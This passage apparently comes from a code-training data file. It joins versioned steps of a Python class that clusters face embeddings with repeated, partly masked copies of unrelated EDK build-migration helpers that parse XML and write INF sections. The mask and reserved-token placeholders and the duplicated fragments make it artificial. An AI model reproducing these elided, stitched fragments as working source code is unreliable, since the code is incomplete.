float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-3": "<mask token>\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cluster:\n metric = 2\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,\n label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings\n ) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n\n def get_embeddings(self, with_embeddings_ids=False, as_dict=False,\n as_list=False):\n if with_embeddings_ids or as_dict:\n if as_dict:\n return self.embeddings_dict\n return self.embeddings_dict.items()\n embeddings = self.embeddings_dict.values()\n if as_list:\n return list(embeddings)\n return embeddings\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return len(self.embeddings_dict)\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n\n def add_embeddings(self, new_embeddings, new_embeddings_ids=None,\n overwrite=False):\n if not new_embeddings:\n return\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point +\n embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n try:\n self.center_point = (old_num_embeddings * self.center_point -\n embedding) / self.num_embeddings\n except ZeroDivisionError:\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-4": "from Logic.ProperLogic.helper_classes.reducer import MaxReducer\nfrom Logic.ProperLogic.misc_helpers import log_error\nimport torch\nfrom itertools import count\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cluster:\n metric = 2\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,\n label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings\n ) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n\n def get_embeddings(self, with_embeddings_ids=False, as_dict=False,\n as_list=False):\n if with_embeddings_ids or as_dict:\n if as_dict:\n return self.embeddings_dict\n return self.embeddings_dict.items()\n embeddings = self.embeddings_dict.values()\n if as_list:\n return list(embeddings)\n return embeddings\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return len(self.embeddings_dict)\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n\n def add_embeddings(self, new_embeddings, new_embeddings_ids=None,\n overwrite=False):\n if not new_embeddings:\n return\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point +\n embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n try:\n self.center_point = (old_num_embeddings * self.center_point -\n embedding) / self.num_embeddings\n except ZeroDivisionError:\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-5": "from Logic.ProperLogic.helper_classes.reducer import MaxReducer\nfrom Logic.ProperLogic.misc_helpers import log_error\nimport torch\n\nfrom itertools import count\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cluster:\n metric = 2\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None, label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n # cast embeddings to dict\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n\n def get_embeddings(self, with_embeddings_ids=False, as_dict=False, as_list=False):\n if with_embeddings_ids or as_dict:\n if as_dict:\n return self.embeddings_dict\n return self.embeddings_dict.items()\n\n embeddings = self.embeddings_dict.values()\n if as_list:\n return list(embeddings)\n return embeddings\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return len(self.embeddings_dict)\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite=False):\n return self.add_embeddings([new_embedding], [new_embedding_id], overwrite)\n\n def add_embeddings(self, new_embeddings, new_embeddings_ids=None, overwrite=False):\n if not new_embeddings:\n return\n\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n\n # TODO: Check the math!!!\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point + embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n\n # TODO: Check the math!!!\n\n # (old_center is a uniformly weighted sum of the old embeddings)\n try:\n self.center_point = (old_num_embeddings * self.center_point - embedding) / self.num_embeddings\n except ZeroDivisionError: # num_embeddings is 0\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n # return reduce(torch.add, embeddings)\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-ids": [
7,
17,
20,
21,
22
]
}
|
[
7,
17,
20,
21,
22
] |
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
XmlTag = 'Usage'
Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = 'FeatureFlag'
Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
XmlTag = 'SupArchList'
Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
Common.HelpText = XmlElement(XmlCommon, XmlTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
XmlParentTag = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParentTag + '/' + NameTag
CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'GuidValue'
CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'Version'
CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
CommonHeader.FileName = os.path.basename(FileName)
CommonHeader.FullPath = os.path.abspath(FileName)
<|reserved_special_token_0|>
def AddToSpecificationDict(SpecificationDict, SpecificationString):
"""Abstract specification name, value pair from Specification String"""
for SpecificationMatch in mReSpecification.finditer(SpecificationString):
Specification = SpecificationMatch.group('Specification')
Value = SpecificationMatch.group('Value')
SpecificationDict[Specification] = Value
<|reserved_special_token_0|>
def LoadClonedRecord(XmlCloned):
ClonedRecord = ClonedRecordClass()
XmlTag = 'Id'
ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
XmlTag = 'FarGuid'
ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageGuid'
ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageVersion'
ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleGuid'
ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleVersion'
ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
return ClonedRecord
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
XmlTag = 'Name'
GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
if XmlParent == 'Entry':
XmlTag = '%s/C_Name' % XmlParent
elif XmlParent == 'GuidCNames':
XmlTag = '%s/GuidCName' % XmlParent
else:
XmlTag = '%s/%sCName' % (XmlParent, XmlParent)
GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
XmlTag = XmlParent + '/' + 'GuidValue'
GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
if XmlParent.endswith('Notify'):
GuidProtocolPpiCommon.Notify = True
XmlTag = 'GuidTypeList'
GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.SupModuleList = SupModules.split()
SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
return GuidProtocolPpiCommon
def LoadPcd(XmlPcd):
"""Return a new PcdClass object equivalent to XmlPcd"""
Pcd = PcdClass()
XmlTag = 'PcdEntry/C_Name'
Pcd.CName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/Token'
Pcd.Token = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/TokenSpaceGuidCName'
Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DatumType'
Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/MaxDatumSize'
Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DefaultValue'
Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdItemType'
Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/ValidUsage'
Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
XmlTag = 'SupModuleList'
Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
SetCommon(Pcd, XmlPcd)
return Pcd
<|reserved_special_token_0|>
def StoreTextFile(TextFile, Content):
EdkLogger.verbose(Content)
TextFile.write(Content)
def AddToSection(Section, Arch, Item):
SectionArch = Section.get(Arch, [])
if Item not in SectionArch:
SectionArch.append(Item)
Section[Arch] = SectionArch
<|reserved_special_token_0|>
def GetUserExtensions(UserExtensions):
UserId = UserExtensions.UserID
Identifier = UserExtensions.Identifier
Content = UserExtensions.Content
return '[UserExtensions.%s.%s]\n %s\n\n' % (UserId, Identifier, Content)
<|reserved_special_token_0|>
def GetXmlFileInfo(FileName, TagTuple):
XmlDom = XmlParseFile(FileName)
return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
Version = '%s Version %.2f' % (ToolName, VersionNumber)
Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
Parser = OptionParser(description=Copyright, version=Version, usage=
UsageString)
Parser.add_option('-o', '--output', dest='OutputFile', help=
'The name of the %s file to be created.' % Destinate)
Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
default=False, help=
'Automatically create the %s file using the name of the %s file and replacing file extension'
% (Source, Destinate))
Parser.add_option('-q', '--quiet', action='store_true', type=None, help
='Disable all messages except FATAL ERRORS.')
Parser.add_option('-v', '--verbose', action='store_true', type=None,
help='Turn on verbose output with informational messages printed.')
Options, Args = Parser.parse_args()
if Options.verbose:
EdkLogger.setLevel(EdkLogger.VERBOSE)
elif Options.quiet:
EdkLogger.setLevel(EdkLogger.QUIET)
else:
EdkLogger.setLevel(EdkLogger.INFO)
if len(Args) == 0:
raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
Parser.get_usage())
if len(Args) > 1:
raise MigrationError(PARAMETER_INVALID, name='Too many input files',
usage=Parser.get_usage())
InputFile = Args[0]
if not os.path.exists(InputFile):
raise MigrationError(FILE_NOT_FOUND, name=InputFile)
if Options.OutputFile:
if Options.AutoWrite:
raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
usage=Parser.get_usage())
elif Options.AutoWrite:
Options.OutputFile = os.path.splitext(InputFile)[0
] + '.' + Destinate.lower()
else:
raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
get_usage())
return Options, InputFile
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
XmlTag = 'Usage'
Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = 'FeatureFlag'
Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
XmlTag = 'SupArchList'
Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
Common.HelpText = XmlElement(XmlCommon, XmlTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
XmlParentTag = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParentTag + '/' + NameTag
CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'GuidValue'
CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'Version'
CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
CommonHeader.FileName = os.path.basename(FileName)
CommonHeader.FullPath = os.path.abspath(FileName)
<|reserved_special_token_0|>
def AddToSpecificationDict(SpecificationDict, SpecificationString):
"""Abstract specification name, value pair from Specification String"""
for SpecificationMatch in mReSpecification.finditer(SpecificationString):
Specification = SpecificationMatch.group('Specification')
Value = SpecificationMatch.group('Value')
SpecificationDict[Specification] = Value
def SetCommonHeader(CommonHeader, XmlCommonHeader):
"""Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
XmlParent = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParent + '/' + 'Abstract'
CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Description'
CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Copyright'
CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'License'
CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParent + '/' + 'Specification'
Specification = XmlElement(XmlCommonHeader, XmlTag)
AddToSpecificationDict(CommonHeader.Specification, Specification)
XmlTag = XmlParent + '/' + 'ModuleType'
CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)
def LoadClonedRecord(XmlCloned):
ClonedRecord = ClonedRecordClass()
XmlTag = 'Id'
ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
XmlTag = 'FarGuid'
ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageGuid'
ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageVersion'
ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleGuid'
ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleVersion'
ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
return ClonedRecord
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
XmlTag = 'Name'
GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
if XmlParent == 'Entry':
XmlTag = '%s/C_Name' % XmlParent
elif XmlParent == 'GuidCNames':
XmlTag = '%s/GuidCName' % XmlParent
else:
XmlTag = '%s/%sCName' % (XmlParent, XmlParent)
GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
XmlTag = XmlParent + '/' + 'GuidValue'
GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
if XmlParent.endswith('Notify'):
GuidProtocolPpiCommon.Notify = True
XmlTag = 'GuidTypeList'
GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.SupModuleList = SupModules.split()
SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
return GuidProtocolPpiCommon
def LoadPcd(XmlPcd):
"""Return a new PcdClass object equivalent to XmlPcd"""
Pcd = PcdClass()
XmlTag = 'PcdEntry/C_Name'
Pcd.CName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/Token'
Pcd.Token = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/TokenSpaceGuidCName'
Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DatumType'
Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/MaxDatumSize'
Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DefaultValue'
Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdItemType'
Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/ValidUsage'
Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
XmlTag = 'SupModuleList'
Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
SetCommon(Pcd, XmlPcd)
return Pcd
def LoadLibraryClass(XmlLibraryClass):
LibraryClass = LibraryClassClass()
XmlTag = 'LibraryClass/Keyword'
LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)
if LibraryClass.LibraryClass == '':
XmlTag = 'Name'
LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)
XmlTag = 'LibraryClass/IncludeHeader'
LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)
XmlTag = 'RecommendedInstanceVersion'
RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion
XmlTag = 'RecommendedInstanceGuid'
RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlLibraryClass, XmlTag)
LibraryClass.SupModuleList = SupModules.split()
SetCommon(LibraryClass, XmlLibraryClass)
return LibraryClass
def LoadBuildOption(XmlBuildOption):
"""Return a new BuildOptionClass object equivalent to XmlBuildOption"""
BuildOption = BuildOptionClass()
BuildOption.Option = XmlElementData(XmlBuildOption)
XmlTag = 'BuildTargets'
BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()
XmlTag = 'ToolChainFamily'
BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'TagName'
BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'ToolCode'
BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)
XmlTag = 'SupArchList'
BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()
return BuildOption
def LoadUserExtensions(XmlUserExtensions):
UserExtensions = UserExtensionsClass()
XmlTag = 'UserID'
UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)
XmlTag = 'Identifier'
UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)
UserExtensions.Content = XmlElementData(XmlUserExtensions)
return UserExtensions
def StoreTextFile(TextFile, Content):
EdkLogger.verbose(Content)
TextFile.write(Content)
def AddToSection(Section, Arch, Item):
SectionArch = Section.get(Arch, [])
if Item not in SectionArch:
SectionArch.append(Item)
Section[Arch] = SectionArch
<|reserved_special_token_0|>
def StoreHeader(TextFile, CommonHeader):
CopyRight = CommonHeader.Copyright
Abstract = CommonHeader.Abstract
Description = CommonHeader.Description
License = CommonHeader.License
Header = '#/** @file\n#\n'
Header += '# ' + Abstract + '\n#\n'
Header += '# ' + Description.strip().replace('\n', '\n# ') + '\n'
Header += '# ' + CopyRight + '\n#\n'
Header += '# ' + License.replace('\n', '\n# ').replace(' ', ' ')
Header += '\n#\n#**/\n\n'
StoreTextFile(TextFile, Header)
def StoreDefinesSection(TextFile, DefinesTupleList):
Section = '[Defines]\n'
for DefineItem in DefinesTupleList:
Section += ' %-30s = %s\n' % DefineItem
Section += '\n\n'
StoreTextFile(TextFile, Section)
def GetUserExtensions(UserExtensions):
UserId = UserExtensions.UserID
Identifier = UserExtensions.Identifier
Content = UserExtensions.Content
return '[UserExtensions.%s.%s]\n %s\n\n' % (UserId, Identifier, Content)
<|reserved_special_token_0|>
def GetTextFileInfo(FileName, TagTuple):
ValueTuple = [''] * len(TagTuple)
try:
for Line in open(FileName):
Line = Line.split('#', 1)[0]
MatchEquation = mReEquation.match(Line)
if MatchEquation:
Tag = MatchEquation.group(1).upper()
Value = MatchEquation.group(2)
for Index in range(len(TagTuple)):
if TagTuple[Index] == Tag:
ValueTuple[Index] = Value
except:
EdkLogger.info('IO Error in reading file %s' % FileName)
return ValueTuple
def GetXmlFileInfo(FileName, TagTuple):
XmlDom = XmlParseFile(FileName)
return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
Version = '%s Version %.2f' % (ToolName, VersionNumber)
Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
Parser = OptionParser(description=Copyright, version=Version, usage=
UsageString)
Parser.add_option('-o', '--output', dest='OutputFile', help=
'The name of the %s file to be created.' % Destinate)
Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
default=False, help=
'Automatically create the %s file using the name of the %s file and replacing file extension'
% (Source, Destinate))
Parser.add_option('-q', '--quiet', action='store_true', type=None, help
='Disable all messages except FATAL ERRORS.')
Parser.add_option('-v', '--verbose', action='store_true', type=None,
help='Turn on verbose output with informational messages printed.')
Options, Args = Parser.parse_args()
if Options.verbose:
EdkLogger.setLevel(EdkLogger.VERBOSE)
elif Options.quiet:
EdkLogger.setLevel(EdkLogger.QUIET)
else:
EdkLogger.setLevel(EdkLogger.INFO)
if len(Args) == 0:
raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
Parser.get_usage())
if len(Args) > 1:
raise MigrationError(PARAMETER_INVALID, name='Too many input files',
usage=Parser.get_usage())
InputFile = Args[0]
if not os.path.exists(InputFile):
raise MigrationError(FILE_NOT_FOUND, name=InputFile)
if Options.OutputFile:
if Options.AutoWrite:
raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
usage=Parser.get_usage())
elif Options.AutoWrite:
Options.OutputFile = os.path.splitext(InputFile)[0
] + '.' + Destinate.lower()
else:
raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
get_usage())
return Options, InputFile
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
XmlTag = 'Usage'
Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = 'FeatureFlag'
Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
XmlTag = 'SupArchList'
Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
Common.HelpText = XmlElement(XmlCommon, XmlTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
XmlParentTag = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParentTag + '/' + NameTag
CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
